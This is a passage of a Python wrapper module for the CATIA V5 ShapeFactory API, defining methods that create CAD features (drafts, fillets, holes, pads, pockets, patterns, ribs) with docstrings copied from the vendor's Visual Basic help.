| unchanged in the draft operation, while faces adjacent to it and specified for
| drafting will be rotated by the draft angle.
|
| Parameters:
|
| iFaceToDraft
| The first face to draft in the body. This face should be adjacent
| to the iFaceToDraft face. If several faces are to be drafted, only the first
| one is specified here, the others being inferred by propagating the draft
| operation onto faces adjacent to this first face. This is controlled by the
| iNeutralMode argument.
| The following
|
| Boundary object is supported: Face.
| iNeutral
| The reference face for the draft. The draft needs a reference face on
| the body, that will remain unchanged in the draft operation, while faces
| adjacent to it and specified for drafting will be rotated according to the
| draft angle iAngle.
| The following Boundary object is supported:
| PlanarFace.
| iNeutralMode
| Controls if and how the drafting operation should be propagated beyond
| the first face to draft iFaceToDraft to other adjacent faces.
|
| iParting
| The draft parting plane, face or surface. It specifies the element
| within the body to draft that represents the bottom of the mold. This element
| can be located either somewhere in the middle of the body or be one of its
| boundary faces. When located in the middle of the body, it crosses the faces to
| draft, and as a result, those faces are drafted with a positive angle on one
| side of the parting surface, and with a negative angle on the other
| side.
| The following Boundary object is supported:
| PlanarFace.
| iDirX,iDirY,iDirZ
| The X, Y, and Z components of the absolute vector representing the
| drafting direction (i.e. the mold extraction direction).
|
| iMode
| The draft connecting mode to its reference face iFaceToDraft
|
| iAngle
| The draft angle
| iMultiselectionMode.
| The elements to be drafted can be selected explicitly or can implicitly
| selected as neighbors of the neutral face
| Returns:
| The created draft
:param Reference i_face_to_draft:
:param Reference i_neutral:
:param int i_neutral_mode:
:param Reference i_parting:
:param float i_dir_x:
:param float i_dir_y:
:param float i_dir_z:
:param int i_mode:
:param float i_angle:
:param int i_multiselection_mode:
:return: Draft
:rtype: Draft
"""
return Draft(self.shape_factory.AddNewDraft(i_face_to_draft.com_object, i_neutral.com_object, i_neutral_mode,
i_parting.com_object, i_dir_x, i_dir_y, i_dir_z, i_mode, i_angle,
i_multiselection_mode))
def add_new_edge_fillet_with_constant_radius(self, i_edge_to_fillet: Reference, i_propag_mode: int,
i_radius: float) -> ConstRadEdgeFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewEdgeFilletWithConstantRadius(Reference
| iEdgeToFillet,
| CatFilletEdgePropagation iPropagMode,
| double iRadius) As ConstRadEdgeFillet
|
| Deprecated:
| V5R14 #AddNewEdgeFilletWithConstantRadius use
| AddNewSolidEdgeFilletWithConstantRadius or
| AddNewSurfaceEdgeFilletWithConstantRadius depending on the type of fillet you
| want to create
:param Reference i_edge_to_fillet:
:param int i_propag_mode:
:param float i_radius:
:return: ConstRadEdgeFillet
:rtype: ConstRadEdgeFillet
"""
return ConstRadEdgeFillet(
self.shape_factory.AddNewEdgeFilletWithConstantRadius(i_edge_to_fillet.com_object, i_propag_mode, i_radius))
def add_new_edge_fillet_with_varying_radius(self, i_edge_to_fillet: Reference, i_propag_mode: int,
i_variation_mode: int, i_default_radius: float) -> VarRadEdgeFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewEdgeFilletWithVaryingRadius(Reference
| iEdgeToFillet,
| CatFilletEdgePropagation iPropagMode,
| CatFilletVariation iVariationMode,
| double iDefaultRadius) As VarRadEdgeFillet
|
| Deprecated:
| V5R14 #AddNewEdgeFilletWithVaryingRadius use
| AddNewSolidEdgeFilletWithVaryingRadius or
| AddNewSurfaceEdgeFilletWithVaryingRadius depending on the type of fillet you
| want to create
:param Reference i_edge_to_fillet:
:param int i_propag_mode:
:param int i_variation_mode:
:param float i_default_radius:
:return: VarRadEdgeFillet
:rtype: VarRadEdgeFillet
"""
return VarRadEdgeFillet(
self.shape_factory.AddNewEdgeFilletWithVaryingRadius(i_edge_to_fillet.com_object, i_propag_mode,
i_variation_mode, i_default_radius))
def add_new_face_fillet(self, i_f1: Reference, i_f2: Reference, i_radius: float) -> FaceFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewFaceFillet(Reference iF1,
| Reference iF2,
| double iRadius) As FaceFillet
|
| Deprecated:
| V5R14 #AddNewFaceFillet use AddNewSolidFaceFillet or
| AddNewSurfaceFaceFillet depending on the type of fillet you want to create
:param Reference i_f1:
:param Reference i_f2:
:param float i_radius:
:return: FaceFillet
:rtype: FaceFillet
"""
return FaceFillet(self.shape_factory.AddNewFaceFillet(i_f1.com_object, i_f2.com_object, i_radius))
def add_new_gsd_circ_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_radial_dir: int,
i_nb_of_copies_in_angular_dir: int, i_step_in_radial_dir: float,
i_step_in_angular_dir: float, i_shape_to_copy_position_along_radial_dir: int,
i_shape_to_copy_position_along_angular_dir: int, i_rotation_center: Reference,
i_rotation_axis: Reference, i_is_reversed_rotation_axis: bool, i_rotation_angle: float,
i_is_radius_aligned: bool, i_complete_crown: bool, i_type: float) -> CircPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewGSDCircPattern(AnyObject iShapeToCopy,
| long iNbOfCopiesInRadialDir,
| long iNbOfCopiesInAngularDir,
| double iStepInRadialDir,
| double iStepInAngularDir,
| long iShapeToCopyPositionAlongRadialDir,
| long iShapeToCopyPositionAlongAngularDir,
| Reference iRotationCenter,
| Reference iRotationAxis,
| boolean iIsReversedRotationAxis,
| double iRotationAngle,
| boolean iIsRadiusAligned,
| boolean iCompleteCrown,
| double iType) As CircPattern
|
| Deprecated:
| V5R15 #AddNewSurfacicCircPattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_radial_dir:
:param int i_nb_of_copies_in_angular_dir:
:param float i_step_in_radial_dir:
:param float i_step_in_angular_dir:
:param int i_shape_to_copy_position_along_radial_dir:
:param int i_shape_to_copy_position_along_angular_dir:
:param Reference i_rotation_center:
:param Reference i_rotation_axis:
:param bool i_is_reversed_rotation_axis:
:param float i_rotation_angle:
:param bool i_is_radius_aligned:
:param bool i_complete_crown:
:param float i_type:
:return: CircPattern
:rtype: CircPattern
"""
return CircPattern(
self.shape_factory.AddNewGSDCircPattern(i_shape_to_copy.com_object, i_nb_of_copies_in_radial_dir,
i_nb_of_copies_in_angular_dir, i_step_in_radial_dir,
i_step_in_angular_dir, i_shape_to_copy_position_along_radial_dir,
i_shape_to_copy_position_along_angular_dir,
i_rotation_center.com_object, i_rotation_axis.com_object,
i_is_reversed_rotation_axis, i_rotation_angle, i_is_radius_aligned,
i_complete_crown, i_type))
def add_new_gsd_rect_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_dir1: int,
i_nb_of_copies_in_dir2: int, i_step_in_dir1: float, i_step_in_dir2: float,
i_shape_to_copy_position_along_dir1: int, i_shape_to_copy_position_along_dir2: int,
i_dir1: Reference, i_dir2: Reference, i_is_reversed_dir1: bool,
i_is_reversed_dir2: bool, i_rotation_angle: float, i_type: float) -> RectPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewGSDRectPattern(AnyObject iShapeToCopy,
| long iNbOfCopiesInDir1,
| long iNbOfCopiesInDir2,
| double iStepInDir1,
| double iStepInDir2,
| long iShapeToCopyPositionAlongDir1,
| long iShapeToCopyPositionAlongDir2,
| Reference iDir1,
| Reference iDir2,
| boolean iIsReversedDir1,
| boolean iIsReversedDir2,
| double iRotationAngle,
| double iType) As RectPattern
|
| Deprecated:
| V5R15 #AddNewSurfacicRectPattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_dir1:
:param int i_nb_of_copies_in_dir2:
:param float i_step_in_dir1:
:param float i_step_in_dir2:
:param int i_shape_to_copy_position_along_dir1:
:param int i_shape_to_copy_position_along_dir2:
:param Reference i_dir1:
:param Reference i_dir2:
:param bool i_is_reversed_dir1:
:param bool i_is_reversed_dir2:
:param float i_rotation_angle:
:param float i_type:
:return: RectPattern
:rtype: RectPattern
"""
return RectPattern(self.shape_factory.AddNewGSDRectPattern(i_shape_to_copy.com_object, i_nb_of_copies_in_dir1,
i_nb_of_copies_in_dir2, i_step_in_dir1,
i_step_in_dir2, i_shape_to_copy_position_along_dir1,
i_shape_to_copy_position_along_dir2,
i_dir1.com_object, i_dir2.com_object,
i_is_reversed_dir1, i_is_reversed_dir2,
i_rotation_angle, i_type))
def add_new_groove(self, i_sketch: Sketch) -> Groove:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewGroove(Sketch iSketch) As Groove
|
| Creates and returns a new groove within the current body.
| The Revolution, as a supertype for grooves, provides starting and ending
| angles for the groove definition.
|
| Parameters:
|
| iSketch
| The sketch defining the groove section. The sketch must contain a
| contour and an axis that will be used to rotate the contour in the space, thus
| defining the groove. The contour has to penetrate in 3D space the current
| shape.
|
| Returns:
| The created groove
:param Sketch i_sketch:
:return: Groove
:rtype: Groove
"""
return Groove(self.shape_factory.AddNewGroove(i_sketch.com_object))
def add_new_groove_from_ref(self, i_profile_elt: Reference) -> Groove:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewGrooveFromRef(Reference iProfileElt) As Groove
|
| Creates and returns a new groove within the current body.
|
| Parameters:
|
| iProfileElt
| The reference on the element defining the groove base
|
|
| Returns:
| The created groove
:param Reference i_profile_elt:
:return: Groove
:rtype: Groove
"""
return Groove(self.shape_factory.AddNewGrooveFromRef(i_profile_elt.com_object))
def add_new_hole(self, i_support: Reference, i_depth: float) -> Hole:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewHole(Reference iSupport,
| double iDepth) As Hole
|
| Creates and returns a new hole within the current shape.
| Actual hole shape is defined by editing hole properties after its
| creation.
|
| Parameters:
|
| iSupport
| The support defining the hole reference plane.
| Anchor point is located at the barycenter of the support. The hole
| axis in 3D passes through that point and is normal to the
| plane.
| The following
|
| Boundary object is supported: Face.
| iDepth
| The hole depth.
| Returns:
| The created hole
:param Reference i_support:
:param float i_depth:
:return: Hole
:rtype: Hole
"""
return Hole(self.shape_factory.AddNewHole(i_support.com_object, i_depth))
def add_new_hole_from_point(self, i_x: float, i_y: float, i_z: float, i_support: Reference, i_depth: float) -> Hole:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewHoleFromPoint(double iX,
| double iY,
| double iZ,
| Reference iSupport,
| double iDepth) As Hole
|
| Creates and returns a new hole within the current shape.
| Actual hole shape is defined by editing hole properties after its
| creation.
|
| Parameters:
|
| iX
| Origin point x absolute coordinate
| iY
| Origin point y absolute coordinate
| iZ
| Origin point z absolute coordinate
| Sets the origin point which the hole is anchored
| to.
| If mandatory, the entry point will be projected onto a tangent
| plane.
| iSupport
| The support defining the hole reference plane.
| The following
|
| Boundary object is supported: Face.
| iDepth
| The hole depth.
| Returns:
| The created hole
:param float i_x:
:param float i_y:
:param float i_z:
:param Reference i_support:
:param float i_depth:
:return: Hole
:rtype: Hole
"""
return Hole(self.shape_factory.AddNewHoleFromPoint(i_x, i_y, i_z, i_support.com_object, i_depth))
def add_new_hole_from_ref_point(self, i_origin: Reference, i_support: Reference, i_depth: float) -> Hole:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewHoleFromRefPoint(Reference iOrigin,
| Reference iSupport,
| double iDepth) As Hole
|
| Creates and returns a new hole within the current shape.
| Actual hole shape is defined by editing hole properties after its
| creation.
|
| Parameters:
|
| iOrigin
| The origin point which the hole is anchored to.
| iSupport
| The support defining the hole reference plane.
| The following
|
| Boundary object is supported: Face.
| iDepth
| The hole depth.
| Returns:
| The created hole
:param Reference i_origin:
:param Reference i_support:
:param float i_depth:
:return: Hole
:rtype: Hole
"""
return Hole(self.shape_factory.AddNewHoleFromRefPoint(i_origin.com_object, i_support.com_object, i_depth))
def add_new_hole_from_sketch(self, i_sketch: Sketch, i_depth: float) -> Hole:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewHoleFromSketch(Sketch iSketch,
| double iDepth) As Hole
|
| Creates and returns a new hole within the current shape.
| Actual hole shape is defined by editing hole properties after its
| creation.
|
| Parameters:
|
| iSketch
| The sketch defining the hole reference plane and anchor
| point.
| This sketch must contain a single point that defines the hole axis:
| the hole axis in 3D passes through that point and is normal to the sketch
| plane.
| iDepth
| The hole depth.
|
| Returns:
| The created hole
:param Sketch i_sketch:
:param float i_depth:
:return: Hole
:rtype: Hole
"""
return Hole(self.shape_factory.AddNewHoleFromSketch(i_sketch.com_object, i_depth))
def add_new_hole_with2_constraints(self, i_x: float, i_y: float, i_z: float, i_edge1: Reference, i_edge2: Reference,
i_support: Reference, i_depth: float) -> Hole:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewHoleWith2Constraints(double iX,
| double iY,
| double iZ,
| Reference iEdge1,
| Reference iEdge2,
| Reference iSupport,
| double iDepth) As Hole
|
| Creates and returns a new hole within the current shape.
| Actual hole shape is defined by editing hole properties after its
| creation.
|
| Parameters:
|
| iX
| Origin point x absolute coordinate
| iY
| Origin point y absolute coordinate
| iZ
| Origin point z absolute coordinate
| Sets the origin point which the hole is anchored
| to.
| If mandatory, the entry point will be projected onto a tangent
| plane.
| iEdge
| The edge which the hole is constrained to.
| The origin of the hole will have a length constraint with each
| edge.
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| iSupport
| The support defining the hole reference plane.
| The following Boundary object is supported: Face.
| iDepth
| The hole depth.
| Returns:
| The created hole
:param float i_x:
:param float i_y:
:param float i_z:
:param Reference i_edge1:
:param Reference i_edge2:
:param Reference i_support:
:param float i_depth:
:return: Hole
:rtype: Hole
"""
return Hole(self.shape_factory.AddNewHoleWith2Constraints(i_x, i_y, i_z, i_edge1.com_object, i_edge2.com_object,
i_support.com_object, i_depth))
def add_new_hole_with_constraint(self, i_x: float, i_y: float, i_z: float, i_edge: Reference, i_support: Reference,
i_depth: float) -> Hole:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewHoleWithConstraint(double iX,
| double iY,
| double iZ,
| Reference iEdge,
| Reference iSupport,
| double iDepth) As Hole
|
| Creates and returns a new hole within the current shape.
| Actual hole shape is defined by editing hole properties after its
| creation.
|
| Parameters:
|
| iX
| Origin point x absolute coordinate
| iY
| Origin point y absolute coordinate
| iZ
| Origin point z absolute coordinate
| Sets the origin point which the hole is anchored
| to.
| If mandatory, the entry point will be projected onto a tangent
| plane.
| iEdge
| The edge which the hole is constrained to.
| If edge is circular, the origin of the hole will be concentric to
| the edge (iX, iY, iZ will be overridden). if not, the origin of the hole will
| have a length constraint with the edge.
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| iSupport
| The support defining the hole reference plane.
| The following Boundary object is supported: Face.
| iDepth
| The hole depth.
| Returns:
| The created hole
:param float i_x:
:param float i_y:
:param float i_z:
:param Reference i_edge:
:param Reference i_support:
:param float i_depth:
:return: Hole
:rtype: Hole
"""
return Hole(self.shape_factory.AddNewHoleWithConstraint(i_x, i_y, i_z, i_edge.com_object, i_support.com_object,
i_depth))
def add_new_intersect(self, i_body_to_intersect: Body) -> Intersect:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewIntersect(Body iBodyToIntersect) As Intersect
|
| Creates and returns a new intersect operation within the current
| body.
|
| Parameters:
|
| iBodyToIntersect
| The body to intersect with the current body
|
| Returns:
| The created intersect operation
:param Body i_body_to_intersect:
:return: Intersect
:rtype: Intersect
"""
return Intersect(self.shape_factory.AddNewIntersect(i_body_to_intersect.com_object))
def add_new_loft(self) -> AnyObject:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewLoft() As AnyObject
|
| Creates and returns a new Loft feature.
|
| Returns:
| The created Loft feature
:return: AnyObject
:rtype: AnyObject
"""
return AnyObject(self.shape_factory.AddNewLoft())
def add_new_mirror(self, i_mirroring_element: Reference) -> Mirror:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewMirror(Reference iMirroringElement) As Mirror
|
| Creates and returns a new mirror within the current body.
| A mirror allows for transforming existing shapes by a symmetry with respect
| to an existing plane.
|
| Parameters:
|
| iMirroringElement
| The plane used by the mirror as the symmetry
| plane.
| The following
|
| Boundary object is supported: PlanarFace.
| Returns:
| The created mirror
:param Reference i_mirroring_element:
:return: Mirror
:rtype: Mirror
"""
return Mirror(self.shape_factory.AddNewMirror(i_mirroring_element.com_object))
def add_new_pad(self, i_sketch: Sketch, i_height: float) -> Pad:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewPad(Sketch iSketch,
| double iHeight) As Pad
|
| Creates and returns a new pad within the current body.
|
| Parameters:
|
| iSketch
| The sketch defining the pad base
| iHeight
| The pad height
|
| Returns:
| The created pad
:param Sketch i_sketch:
:param float i_height:
:return: Pad
:rtype: Pad
"""
return Pad(self.shape_factory.AddNewPad(i_sketch.com_object, i_height))
def add_new_pad_from_ref(self, i_profile_elt: Reference, i_height: float) -> Pad:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewPadFromRef(Reference iProfileElt,
| double iHeight) As Pad
|
| Creates and returns a new pad within the current body.
|
| Parameters:
|
| iProfileElt
| The reference on the element defining the pad base
|
| iHeight
| The pad height
|
| Returns:
| The created pad
:param Reference i_profile_elt:
:param float i_height:
:return: Pad
:rtype: Pad
"""
return Pad(self.shape_factory.AddNewPadFromRef(i_profile_elt.com_object, i_height))
def add_new_pocket(self, i_sketch: Sketch, i_height: float) -> Pocket:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewPocket(Sketch iSketch,
| double iHeight) As Pocket
|
| Creates and returns a new pocket within the current shape.
|
| Parameters:
|
| iSketch
| The sketch defining the pocket base
| iDepth
| The pocket depth
|
| Returns:
| The created pocket
:param Sketch i_sketch:
:param float i_height:
:return: Pocket
:rtype: Pocket
"""
return Pocket(self.shape_factory.AddNewPocket(i_sketch.com_object, i_height))
def add_new_pocket_from_ref(self, i_profile_elt: Reference, i_height: float) -> Pocket:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewPocketFromRef(Reference iProfileElt,
| double iHeight) As Pocket
|
| Creates and returns a new pocket within the current shape.
|
| Parameters:
|
| iProfileElt
| The reference on the element defining the pocket base
|
| iDepth
| The pocket depth
|
| Returns:
| The created pocket
:param Reference i_profile_elt:
:param float i_height:
:return: Pocket
:rtype: Pocket
"""
return Pocket(self.shape_factory.AddNewPocketFromRef(i_profile_elt.com_object, i_height))
def add_new_rect_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_dir1: int, i_nb_of_copies_in_dir2: int,
i_step_in_dir1: float, i_step_in_dir2: float, i_shape_to_copy_position_along_dir1: int,
i_shape_to_copy_position_along_dir2: int, i_dir1: Reference, i_dir2: Reference,
i_is_reversed_dir1: bool, i_is_reversed_dir2: bool,
i_rotation_angle: float) -> RectPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRectPattern(AnyObject iShapeToCopy,
| long iNbOfCopiesInDir1,
| long iNbOfCopiesInDir2,
| double iStepInDir1,
| double iStepInDir2,
| long iShapeToCopyPositionAlongDir1,
| long iShapeToCopyPositionAlongDir2,
| Reference iDir1,
| Reference iDir2,
| boolean iIsReversedDir1,
| boolean iIsReversedDir2,
| double iRotationAngle) As RectPattern
|
| Creates and returns a new rectangular pattern within the current
| body.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the rectangular pattern
| iNbOfCopiesInDir1
| The number of times iShapeToCopy will be copied along the pattern
| first direction
| iNbOfCopiesInDir2
| The number of times iShapeToCopy will be copied along the pattern
| second direction
| iStepInDir1
| The distance that will separate two consecutive copies in the
| pattern along its first direction
| iStepInDir2
| The distance that will separate two consecutive copies in the
| pattern along its second direction
| iShapeToCopyPositionAlongDir1
| Specifies the position of the original shape iShapeToCopy among its
| copies along iDir1
| iShapeToCopyPositionAlongDir2
| Specifies the position of the original shape iShapeToCopy among its
| copies along iDir2
| iDir1
| The line or linear edge that specifies the pattern first
| repartition direction
| The following
|
| Boundary objects are supported: PlanarFace, RectilinearTriDimFeatEdge,
| RectilinearBiDimFeatEdge.
| iDir2
| The line or linear edge that specifies the pattern second repartition
| direction
| The following Boundary objects are supported: PlanarFace,
| RectilinearTriDimFeatEdge, RectilinearBiDimFeatEdge.
| iIsReversedDir1
| The boolean flag indicating whether the natural orientation of iDir1
| should be used to orient the pattern operation. True indicates that
| iShapeToCopy is copied in the direction of the natural orientation of iDir1.
|
| iIsReversedDir2
| The boolean flag indicating whether the natural orientation of iDir2
| should be used to orient the pattern operation. True indicates that
| iShapeToCopy is copied in the direction of the natural orientation of iDir2.
|
| iRotationAngle
| The angle applied to both directions iDir1 and iDir2 prior to applying
| the pattern. The original shape iShapeToCopy is used as the rotation center.
| Nevertheless, the copied shapes themselves are not rotated. This allows the
| definition of a rectangular pattern relatively to existing geometry, but not
| necessarily parallel to it.
| Returns:
| The created rectangular pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_dir1:
:param int i_nb_of_copies_in_dir2:
:param float i_step_in_dir1:
:param float i_step_in_dir2:
:param int i_shape_to_copy_position_along_dir1:
:param int i_shape_to_copy_position_along_dir2:
:param Reference i_dir1:
:param Reference i_dir2:
:param bool i_is_reversed_dir1:
:param bool i_is_reversed_dir2:
:param float i_rotation_angle:
:return: RectPattern
:rtype: RectPattern
"""
return RectPattern(self.shape_factory.AddNewRectPattern(i_shape_to_copy.com_object, i_nb_of_copies_in_dir1,
i_nb_of_copies_in_dir2, i_step_in_dir1, i_step_in_dir2,
i_shape_to_copy_position_along_dir1,
i_shape_to_copy_position_along_dir2, i_dir1.com_object,
i_dir2.com_object, i_is_reversed_dir1,
i_is_reversed_dir2, i_rotation_angle))
def add_new_rect_patternof_list(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_dir1: int,
i_nb_of_copies_in_dir2: int, i_step_in_dir1: float, i_step_in_dir2: float,
i_shape_to_copy_position_along_dir1: int, i_shape_to_copy_position_along_dir2: int,
i_dir1: Reference, i_dir2: Reference, i_is_reversed_dir1: bool,
i_is_reversed_dir2: bool, i_rotation_angle: float) -> RectPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRectPatternofList(AnyObject iShapeToCopy,
| long iNbOfCopiesInDir1,
| long iNbOfCopiesInDir2,
| double iStepInDir1,
| double iStepInDir2,
| long iShapeToCopyPositionAlongDir1,
| long iShapeToCopyPositionAlongDir2,
| Reference iDir1,
| Reference iDir2,
| boolean iIsReversedDir1,
| boolean iIsReversedDir2,
| double iRotationAngle) As RectPattern
|
| V5R8 Only: Creates and returns a new rectangular pattern within the current
| body using a list of shapes.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the rectangular pattern Others shapes
| will be add by put_ItemToCopy with CATIAPattern interface
|
| iNbOfCopiesInDir1
| The number of times iShapeToCopy will be copied along the pattern
| first direction
| iNbOfCopiesInDir2
| The number of times iShapeToCopy will be copied along the pattern
| second direction
| iStepInDir1
| The distance that will separate two consecutive copies in the
| pattern along its first direction
| iStepInDir2
| The distance that will separate two consecutive copies in the
| pattern along its second direction
| iShapeToCopyPositionAlongDir1
| Specifies the position of the original shape iShapeToCopy among its
| copies along iDir1
| iShapeToCopyPositionAlongDir2
| Specifies the position of the original shape iShapeToCopy among its
| copies along iDir2
| iDir1
| The line or linear edge that specifies the pattern first
| repartition direction
| iDir2
| The line or linear edge that specifies the pattern second
| repartition direction
| iIsReversedDir1
| The boolean flag indicating whether the natural orientation of
| iDir1 should be used to orient the pattern operation. True indicates that
| iShapeToCopy is copied in the direction of the natural orientation of iDir1.
|
| iIsReversedDir2
| The boolean flag indicating whether the natural orientation of
| iDir2 should be used to orient the pattern operation. True indicates that
| iShapeToCopy is copied in the direction of the natural orientation of iDir2.
|
| iRotationAngle
| The angle applied to both directions iDir1 and iDir2 prior to
| applying the pattern. The original shape iShapeToCopy is used as the rotation
| center. Nevertheless, the copied shapes themselves are not rotated. This allows
| the definition of a rectangular pattern relatively to existing geometry, but
| not necessarily parallel to it.
|
| Returns:
| The created rectangular pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_dir1:
:param int i_nb_of_copies_in_dir2:
:param float i_step_in_dir1:
:param float i_step_in_dir2:
:param int i_shape_to_copy_position_along_dir1:
:param int i_shape_to_copy_position_along_dir2:
:param Reference i_dir1:
:param Reference i_dir2:
:param bool i_is_reversed_dir1:
:param bool i_is_reversed_dir2:
:param float i_rotation_angle:
:return: RectPattern
:rtype: RectPattern
"""
return RectPattern(
self.shape_factory.AddNewRectPatternofList(i_shape_to_copy.com_object, i_nb_of_copies_in_dir1,
i_nb_of_copies_in_dir2, i_step_in_dir1, i_step_in_dir2,
i_shape_to_copy_position_along_dir1,
i_shape_to_copy_position_along_dir2, i_dir1.com_object,
i_dir2.com_object, i_is_reversed_dir1, i_is_reversed_dir2,
i_rotation_angle))
def add_new_remove(self, i_body_to_remove: Body) -> Remove:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRemove(Body iBodyToRemove) As Remove
|
| Creates and returns a new remove operation within the current
| body.
|
| Parameters:
|
| iBodyToRemove
| The body to remove from the current body
|
| Returns:
| The created remove operation
:param Body i_body_to_remove:
:return: Remove
:rtype: Remove
"""
return Remove(self.shape_factory.AddNewRemove(i_body_to_remove.com_object))
def add_new_remove_face(self, i_keep_faces: Reference, i_remove_faces: Reference) -> RemoveFace:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRemoveFace(Reference iKeepFaces,
| Reference iRemoveFaces) As RemoveFace
|
| Creates and returns a new RemoveFace feature.
|
| Parameters:
|
| iKeepFaces
| The reference of the face to Keep.
| iRemoveFaces
| The reference of the face to Remove.
|
| Returns:
| The created RemoveFace feature.
:param Reference i_keep_faces:
:param Reference i_remove_faces:
:return: RemoveFace
:rtype: RemoveFace
"""
return RemoveFace(self.shape_factory.AddNewRemoveFace(i_keep_faces.com_object, i_remove_faces.com_object))
def add_new_removed_blend(self) -> AnyObject:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRemovedBlend() As AnyObject
|
| Creates and returns a new Removed Blend feature.
|
| Returns:
| The created Removed Blend feature
:return: AnyObject
:rtype: AnyObject
"""
return AnyObject(self.shape_factory.AddNewRemovedBlend())
def add_new_removed_loft(self) -> AnyObject:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRemovedLoft() As AnyObject
|
| Creates and returns a new Removed Loft feature.
|
| Returns:
| The created Removed Loft feature
:return: AnyObject
:rtype: AnyObject
"""
return AnyObject(self.shape_factory.AddNewRemovedLoft())
def add_new_replace_face(self, i_split_plane: Reference, i_remove_face: Reference,
i_splitting_side: int) -> ReplaceFace:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewReplaceFace(Reference iSplitPlane,
| Reference iRemoveFace,
| CatSplitSide iSplittingSide) As ReplaceFace
|
| Creates and returns a new Align/ ReplaceFace feature.
|
| Parameters:
|
| iSplitPlane
| The reference of the element defining the Splitting Plane.
|
| iRemoveFace
| The reference of the Face to Remove.
| iSplittingSide
| The specification for which side of the current body should be
| Align
|
| Returns:
| The created Align/ ReplaceFace feature.
:param Reference i_split_plane:
:param Reference i_remove_face:
:param int i_splitting_side:
:return: ReplaceFace
:rtype: ReplaceFace
"""
return ReplaceFace(
self.shape_factory.AddNewReplaceFace(i_split_plane.com_object, i_remove_face.com_object, i_splitting_side))
def add_new_rib(self, i_sketch: Sketch, i_center_curve: Sketch) -> Rib:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRib(Sketch iSketch,
| Sketch iCenterCurve) As Rib
|
| Creates and returns a new rib within the current body.
|
| Parameters:
|
| iSketch
| The sketch defining the rib section
| iCenterCurve
| The sketched curve that defines the rib center curve. It must cross
| the section definition sketch iSketch within the inner part of its contour.
|
|
| Returns:
| The created rib
:param Sketch i_sketch:
:param Sketch i_center_curve:
:return: Rib
:rtype: Rib
"""
return Rib(self.shape_factory.AddNewRib(i_sketch.com_object, i_center_curve.com_object))
def add_new_rib_from_ref(self, i_profile: Reference, i_center_curve: Reference) -> Rib:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRibFromRef(Reference iProfile,
| Reference iCenterCurve) As Rib
|
| Creates and returns a new rib within the current body.
|
| Parameters:
|
| iProfile
| The Profile defining the rib section
| iCenterCurve
| The curve that defines the rib center curve.
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| Returns:
| The created rib
:param Reference i_profile:
:param Reference i_center_curve:
:return: Rib
:rtype: Rib
"""
return Rib(self.shape_factory.AddNewRibFromRef(i_profile.com_object, i_center_curve.com_object))
def add_new_scaling(self, i_scaling_reference: Reference, i_factor: float) -> Scaling:
"""
.. note::
:class: toggle
